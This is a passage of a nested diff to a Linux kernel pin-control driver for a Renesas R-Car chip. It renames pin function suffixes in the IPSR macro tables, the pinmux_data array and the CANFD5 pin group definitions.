++#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX_A)		FM(IRQ4_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_23_20	FM(FXR_TXENB_N_A)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)		FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_31_28	FM(TPU0TO1_A)		FM(CANFD6_TX)		F_(0, 0)		FM(TCLK2_C)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)		FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_3_0	FM(TPU0TO0_A)		FM(CANFD6_RX)		F_(0, 0)		FM(TCLK1_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_B)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_B)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)		FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)		FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2_A)		F_(0, 0)		FM(TCLK3_C)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3_A)		FM(PWM1_B)		FM(TCLK4_C)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+@@ -375,8 +375,8 @@
+ #define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)		FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_N_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)		FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_N_A)	FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+@@ -712,22 +712,22 @@ static const u16 pinmux_data[] = {
+ 
+ 	/* IP0SR0 */
+ 	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_N_B),
+-	PINMUX_IPSR_GPSR(IP0SR0_3_0,	TCLK2_A),
++	PINMUX_IPSR_GPSR(IP0SR0_3_0,	TCLK2_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_7_4,	MSIOF3_SS1),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_11_8,	MSIOF3_SS2),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR0_15_12,	IRQ3),
++	PINMUX_IPSR_GPSR(IP0SR0_15_12,	IRQ3_A),
+ 	PINMUX_IPSR_GPSR(IP0SR0_15_12,	MSIOF3_SCK),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR0_19_16,	IRQ2),
++	PINMUX_IPSR_GPSR(IP0SR0_19_16,	IRQ2_A),
+ 	PINMUX_IPSR_GPSR(IP0SR0_19_16,	MSIOF3_TXD),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR0_23_20,	IRQ1),
++	PINMUX_IPSR_GPSR(IP0SR0_23_20,	IRQ1_A),
+ 	PINMUX_IPSR_GPSR(IP0SR0_23_20,	MSIOF3_RXD),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR0_27_24,	IRQ0),
++	PINMUX_IPSR_GPSR(IP0SR0_27_24,	IRQ0_A),
+ 	PINMUX_IPSR_GPSR(IP0SR0_27_24,	MSIOF3_SYNC),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_31_28,	MSIOF5_SS2),
+@@ -744,75 +744,75 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR0_19_16,	MSIOF5_RXD),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR0_23_20,	MSIOF2_SS2),
+-	PINMUX_IPSR_GPSR(IP1SR0_23_20,	TCLK1),
+-	PINMUX_IPSR_GPSR(IP1SR0_23_20,	IRQ2_A),
++	PINMUX_IPSR_GPSR(IP1SR0_23_20,	TCLK1_A),
++	PINMUX_IPSR_GPSR(IP1SR0_23_20,	IRQ2_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR0_27_24,	MSIOF2_SS1),
+-	PINMUX_IPSR_GPSR(IP1SR0_27_24,	HTX1),
+-	PINMUX_IPSR_GPSR(IP1SR0_27_24,	TX1),
++	PINMUX_IPSR_GPSR(IP1SR0_27_24,	HTX1_A),
++	PINMUX_IPSR_GPSR(IP1SR0_27_24,	TX1_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR0_31_28,	MSIOF2_SYNC),
+-	PINMUX_IPSR_GPSR(IP1SR0_31_28,	HRX1),
+-	PINMUX_IPSR_GPSR(IP1SR0_31_28,	RX1),
++	PINMUX_IPSR_GPSR(IP1SR0_31_28,	HRX1_A),
++	PINMUX_IPSR_GPSR(IP1SR0_31_28,	RX1_A),
+ 
+ 	/* IP2SR0 */
+ 	PINMUX_IPSR_GPSR(IP2SR0_3_0,	MSIOF2_TXD),
+-	PINMUX_IPSR_GPSR(IP2SR0_3_0,	HCTS1_N),
+-	PINMUX_IPSR_GPSR(IP2SR0_3_0,	CTS1_N),
++	PINMUX_IPSR_GPSR(IP2SR0_3_0,	HCTS1_N_A),
++	PINMUX_IPSR_GPSR(IP2SR0_3_0,	CTS1_N_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR0_7_4,	MSIOF2_SCK),
+-	PINMUX_IPSR_GPSR(IP2SR0_7_4,	HRTS1_N),
+-	PINMUX_IPSR_GPSR(IP2SR0_7_4,	RTS1_N),
++	PINMUX_IPSR_GPSR(IP2SR0_7_4,	HRTS1_N_A),
++	PINMUX_IPSR_GPSR(IP2SR0_7_4,	RTS1_N_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR0_11_8,	MSIOF2_RXD),
+-	PINMUX_IPSR_GPSR(IP2SR0_11_8,	HSCK1),
+-	PINMUX_IPSR_GPSR(IP2SR0_11_8,	SCK1),
++	PINMUX_IPSR_GPSR(IP2SR0_11_8,	HSCK1_A),
++	PINMUX_IPSR_GPSR(IP2SR0_11_8,	SCK1_A),
+ 
+ 	/* IP0SR1 */
+ 	PINMUX_IPSR_GPSR(IP0SR1_3_0,	MSIOF1_SS2),
+-	PINMUX_IPSR_GPSR(IP0SR1_3_0,	HTX3_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_3_0,	TX3),
++	PINMUX_IPSR_GPSR(IP0SR1_3_0,	HTX3_B),
++	PINMUX_IPSR_GPSR(IP0SR1_3_0,	TX3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_7_4,	MSIOF1_SS1),
+-	PINMUX_IPSR_GPSR(IP0SR1_7_4,	HCTS3_N_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_7_4,	RX3),
++	PINMUX_IPSR_GPSR(IP0SR1_7_4,	HCTS3_N_B),
++	PINMUX_IPSR_GPSR(IP0SR1_7_4,	RX3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_11_8,	MSIOF1_SYNC),
+-	PINMUX_IPSR_GPSR(IP0SR1_11_8,	HRTS3_N_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_11_8,	RTS3_N),
++	PINMUX_IPSR_GPSR(IP0SR1_11_8,	HRTS3_N_B),
++	PINMUX_IPSR_GPSR(IP0SR1_11_8,	RTS3_N_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_15_12,	MSIOF1_SCK),
+-	PINMUX_IPSR_GPSR(IP0SR1_15_12,	HSCK3_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_15_12,	CTS3_N),
++	PINMUX_IPSR_GPSR(IP0SR1_15_12,	HSCK3_B),
++	PINMUX_IPSR_GPSR(IP0SR1_15_12,	CTS3_N_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_19_16,	MSIOF1_TXD),
+-	PINMUX_IPSR_GPSR(IP0SR1_19_16,	HRX3_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_19_16,	SCK3),
++	PINMUX_IPSR_GPSR(IP0SR1_19_16,	HRX3_B),
++	PINMUX_IPSR_GPSR(IP0SR1_19_16,	SCK3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_23_20,	MSIOF1_RXD),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_27_24,	MSIOF0_SS2),
+-	PINMUX_IPSR_GPSR(IP0SR1_27_24,	HTX1_X),
+-	PINMUX_IPSR_GPSR(IP0SR1_27_24,	TX1_X),
++	PINMUX_IPSR_GPSR(IP0SR1_27_24,	HTX1_B),
++	PINMUX_IPSR_GPSR(IP0SR1_27_24,	TX1_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_31_28,	MSIOF0_SS1),
+-	PINMUX_IPSR_GPSR(IP0SR1_31_28,	HRX1_X),
+-	PINMUX_IPSR_GPSR(IP0SR1_31_28,	RX1_X),
++	PINMUX_IPSR_GPSR(IP0SR1_31_28,	HRX1_B),
++	PINMUX_IPSR_GPSR(IP0SR1_31_28,	RX1_B),
+ 
+ 	/* IP1SR1 */
+ 	PINMUX_IPSR_GPSR(IP1SR1_3_0,	MSIOF0_SYNC),
+-	PINMUX_IPSR_GPSR(IP1SR1_3_0,	HCTS1_N_X),
+-	PINMUX_IPSR_GPSR(IP1SR1_3_0,	CTS1_N_X),
++	PINMUX_IPSR_GPSR(IP1SR1_3_0,	HCTS1_N_B),
++	PINMUX_IPSR_GPSR(IP1SR1_3_0,	CTS1_N_B),
+ 	PINMUX_IPSR_GPSR(IP1SR1_3_0,	CANFD5_TX_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_7_4,	MSIOF0_TXD),
+-	PINMUX_IPSR_GPSR(IP1SR1_7_4,	HRTS1_N_X),
+-	PINMUX_IPSR_GPSR(IP1SR1_7_4,	RTS1_N_X),
++	PINMUX_IPSR_GPSR(IP1SR1_7_4,	HRTS1_N_B),
++	PINMUX_IPSR_GPSR(IP1SR1_7_4,	RTS1_N_B),
+ 	PINMUX_IPSR_GPSR(IP1SR1_7_4,	CANFD5_RX_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_11_8,	MSIOF0_SCK),
+-	PINMUX_IPSR_GPSR(IP1SR1_11_8,	HSCK1_X),
+-	PINMUX_IPSR_GPSR(IP1SR1_11_8,	SCK1_X),
++	PINMUX_IPSR_GPSR(IP1SR1_11_8,	HSCK1_B),
++	PINMUX_IPSR_GPSR(IP1SR1_11_8,	SCK1_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_15_12,	MSIOF0_RXD),
+ 
+@@ -821,15 +821,15 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_23_20,	HCTS0_N),
+ 	PINMUX_IPSR_GPSR(IP1SR1_23_20,	CTS0_N),
+-	PINMUX_IPSR_GPSR(IP1SR1_23_20,	PWM8_A),
++	PINMUX_IPSR_GPSR(IP1SR1_23_20,	PWM8),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_27_24,	HRTS0_N),
+ 	PINMUX_IPSR_GPSR(IP1SR1_27_24,	RTS0_N),
+-	PINMUX_IPSR_GPSR(IP1SR1_27_24,	PWM9_A),
++	PINMUX_IPSR_GPSR(IP1SR1_27_24,	PWM9),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_31_28,	HSCK0),
+ 	PINMUX_IPSR_GPSR(IP1SR1_31_28,	SCK0),
+-	PINMUX_IPSR_GPSR(IP1SR1_31_28,	PWM0_A),
++	PINMUX_IPSR_GPSR(IP1SR1_31_28,	PWM0),
+ 
+ 	/* IP2SR1 */
+ 	PINMUX_IPSR_GPSR(IP2SR1_3_0,	HRX0),
+@@ -839,99 +839,99 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP2SR1_7_4,	IRQ4_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_11_8,	SSI_SCK),
+-	PINMUX_IPSR_GPSR(IP2SR1_11_8,	TCLK3),
++	PINMUX_IPSR_GPSR(IP2SR1_11_8,	TCLK3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_15_12,	SSI_WS),
+-	PINMUX_IPSR_GPSR(IP2SR1_15_12,	TCLK4),
++	PINMUX_IPSR_GPSR(IP2SR1_15_12,	TCLK4_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_19_16,	SSI_SD),
+-	PINMUX_IPSR_GPSR(IP2SR1_19_16,	IRQ0_A),
++	PINMUX_IPSR_GPSR(IP2SR1_19_16,	IRQ0_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_23_20,	AUDIO_CLKOUT),
+-	PINMUX_IPSR_GPSR(IP2SR1_23_20,	IRQ1_A),
++	PINMUX_IPSR_GPSR(IP2SR1_23_20,	IRQ1_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_27_24,	AUDIO_CLKIN),
+ 	PINMUX_IPSR_GPSR(IP2SR1_27_24,	PWM3_A),
+ 
+-	PINMUX_IPSR_GPSR(IP2SR1_31_28,	TCLK2),
++	PINMUX_IPSR_GPSR(IP2SR1_31_28,	TCLK2_A),
+ 	PINMUX_IPSR_GPSR(IP2SR1_31_28,	MSIOF4_SS1),
+ 	PINMUX_IPSR_GPSR(IP2SR1_31_28,	IRQ3_B),
+ 
+ 	/* IP3SR1 */
+-	PINMUX_IPSR_GPSR(IP3SR1_3_0,	HRX3),
++	PINMUX_IPSR_GPSR(IP3SR1_3_0,	HRX3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_3_0,	SCK3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_3_0,	MSIOF4_SS2),
+ 
+-	PINMUX_IPSR_GPSR(IP3SR1_7_4,	HSCK3),
++	PINMUX_IPSR_GPSR(IP3SR1_7_4,	HSCK3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_7_4,	CTS3_N_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_7_4,	MSIOF4_SCK),
+-	PINMUX_IPSR_GPSR(IP3SR1_7_4,	TPU0TO0_A),
++	PINMUX_IPSR_GPSR(IP3SR1_7_4,	TPU0TO0_B),
+ 
+-	PINMUX_IPSR_GPSR(IP3SR1_11_8,	HRTS3_N),
++	PINMUX_IPSR_GPSR(IP3SR1_11_8,	HRTS3_N_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_11_8,	RTS3_N_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_11_8,	MSIOF4_TXD),
+-	PINMUX_IPSR_GPSR(IP3SR1_11_8,	TPU0TO1_A),
++	PINMUX_IPSR_GPSR(IP3SR1_11_8,	TPU0TO1_B),
+ 
+-	PINMUX_IPSR_GPSR(IP3SR1_15_12,	HCTS3_N),
++	PINMUX_IPSR_GPSR(IP3SR1_15_12,	HCTS3_N_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_15_12,	RX3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_15_12,	MSIOF4_RXD),
+ 
+-	PINMUX_IPSR_GPSR(IP3SR1_19_16,	HTX3),
++	PINMUX_IPSR_GPSR(IP3SR1_19_16,	HTX3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_19_16,	TX3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_19_16,	MSIOF4_SYNC),
+ 
+ 	/* IP0SR2 */
+ 	PINMUX_IPSR_GPSR(IP0SR2_3_0,	FXR_TXDA),
+ 	PINMUX_IPSR_GPSR(IP0SR2_3_0,	CANFD1_TX),
+-	PINMUX_IPSR_GPSR(IP0SR2_3_0,	TPU0TO2_A),
++	PINMUX_IPSR_GPSR(IP0SR2_3_0,	TPU0TO2_B),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR2_7_4,	FXR_TXENA_N),
++	PINMUX_IPSR_GPSR(IP0SR2_7_4,	FXR_TXENA_N_A),
+ 	PINMUX_IPSR_GPSR(IP0SR2_7_4,	CANFD1_RX),
+-	PINMUX_IPSR_GPSR(IP0SR2_7_4,	TPU0TO3_A),
++	PINMUX_IPSR_GPSR(IP0SR2_7_4,	TPU0TO3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR2_11_8,	RXDA_EXTFXR),
+-	PINMUX_IPSR_GPSR(IP0SR2_11_8,	CANFD5_TX),
++	PINMUX_IPSR_GPSR(IP0SR2_11_8,	CANFD5_TX_A),
+ 	PINMUX_IPSR_GPSR(IP0SR2_11_8,	IRQ5),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR2_15_12,	CLK_EXTFXR),
+-	PINMUX_IPSR_GPSR(IP0SR2_15_12,	CANFD5_RX),
++	PINMUX_IPSR_GPSR(IP0SR2_15_12,	CANFD5_RX_A),
+ 	PINMUX_IPSR_GPSR(IP0SR2_15_12,	IRQ4_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR2_19_16,	RXDB_EXTFXR),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR2_23_20,	FXR_TXENB_N),
++	PINMUX_IPSR_GPSR(IP0SR2_23_20,	FXR_TXENB_N_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR2_27_24,	FXR_TXDB),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR2_31_28,	TPU0TO1),
++	PINMUX_IPSR_GPSR(IP0SR2_31_28,	TPU0TO1_A),
+ 	PINMUX_IPSR_GPSR(IP0SR2_31_28,	CANFD6_TX),
+-	PINMUX_IPSR_GPSR(IP0SR2_31_28,	TCLK2_B),
++	PINMUX_IPSR_GPSR(IP0SR2_31_28,	TCLK2_C),
+ 
+ 	/* IP1SR2 */
+-	PINMUX_IPSR_GPSR(IP1SR2_3_0,	TPU0TO0),
++	PINMUX_IPSR_GPSR(IP1SR2_3_0,	TPU0TO0_A),
+ 	PINMUX_IPSR_GPSR(IP1SR2_3_0,	CANFD6_RX),
+-	PINMUX_IPSR_GPSR(IP1SR2_3_0,	TCLK1_A),
++	PINMUX_IPSR_GPSR(IP1SR2_3_0,	TCLK1_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_7_4,	CAN_CLK),
+-	PINMUX_IPSR_GPSR(IP1SR2_7_4,	FXR_TXENA_N_X),
++	PINMUX_IPSR_GPSR(IP1SR2_7_4,	FXR_TXENA_N_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_11_8,	CANFD0_TX),
+-	PINMUX_IPSR_GPSR(IP1SR2_11_8,	FXR_TXENB_N_X),
++	PINMUX_IPSR_GPSR(IP1SR2_11_8,	FXR_TXENB_N_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_15_12,	CANFD0_RX),
+ 	PINMUX_IPSR_GPSR(IP1SR2_15_12,	STPWT_EXTFXR),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_19_16,	CANFD2_TX),
+-	PINMUX_IPSR_GPSR(IP1SR2_19_16,	TPU0TO2),
+-	PINMUX_IPSR_GPSR(IP1SR2_19_16,	TCLK3_A),
++	PINMUX_IPSR_GPSR(IP1SR2_19_16,	TPU0TO2_A),
++	PINMUX_IPSR_GPSR(IP1SR2_19_16,	TCLK3_C),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_23_20,	CANFD2_RX),
+-	PINMUX_IPSR_GPSR(IP1SR2_23_20,	TPU0TO3),
++	PINMUX_IPSR_GPSR(IP1SR2_23_20,	TPU0TO3_A),
+ 	PINMUX_IPSR_GPSR(IP1SR2_23_20,	PWM1_B),
+-	PINMUX_IPSR_GPSR(IP1SR2_23_20,	TCLK4_A),
++	PINMUX_IPSR_GPSR(IP1SR2_23_20,	TCLK4_C),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_27_24,	CANFD3_TX),
+-	PINMUX_IPSR_GPSR(IP1SR2_27_24,	PWM2_B),
++	PINMUX_IPSR_GPSR(IP1SR2_27_24,	PWM2),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_31_28,	CANFD3_RX),
+ 	PINMUX_IPSR_GPSR(IP1SR2_31_28,	PWM3_B),
+@@ -973,12 +973,12 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR3_23_20,	IPC_CLKIN),
+ 	PINMUX_IPSR_GPSR(IP1SR3_23_20,	IPC_CLKEN_IN),
+ 	PINMUX_IPSR_GPSR(IP1SR3_23_20,	PWM1_A),
+-	PINMUX_IPSR_GPSR(IP1SR3_23_20,	TCLK3_X),
++	PINMUX_IPSR_GPSR(IP1SR3_23_20,	TCLK3_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKOUT),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKEN_OUT),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_N_A),
+-	PINMUX_IPSR_GPSR(IP1SR3_27_24,	TCLK4_X),
++	PINMUX_IPSR_GPSR(IP1SR3_27_24,	TCLK4_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_31_28,	QSPI0_SSL),
+ 
+@@ -1507,15 +1507,14 @@ static const unsigned int canfd4_data_mux[] = {
+ };
+ 
+ /* - CANFD5 ----------------------------------------------------------------- */
+-static const unsigned int canfd5_data_pins[] = {
+-	/* CANFD5_TX, CANFD5_RX */
++static const unsigned int canfd5_data_a_pins[] = {
++	/* CANFD5_TX_A, CANFD5_RX_A */
+ 	RCAR_GP_PIN(2, 2), RCAR_GP_PIN(2, 3),
+ };
+-static const unsigned int canfd5_data_mux[] = {
+-	CANFD5_TX_MARK, CANFD5_RX_MARK,
++static const unsigned int canfd5_data_a_mux[] = {
++	CANFD5_TX_A_MARK, CANFD5_RX_A_MARK,
+ };
+ 
+-/* - CANFD5_B ----------------------------------------------------------------- */
+ static const unsigned int canfd5_data_b_pins[] = {
+ 	/* CANFD5_TX_B, CANFD5_RX_B */
+ 	RCAR_GP_PIN(1, 8), RCAR_GP_PIN(1, 9),
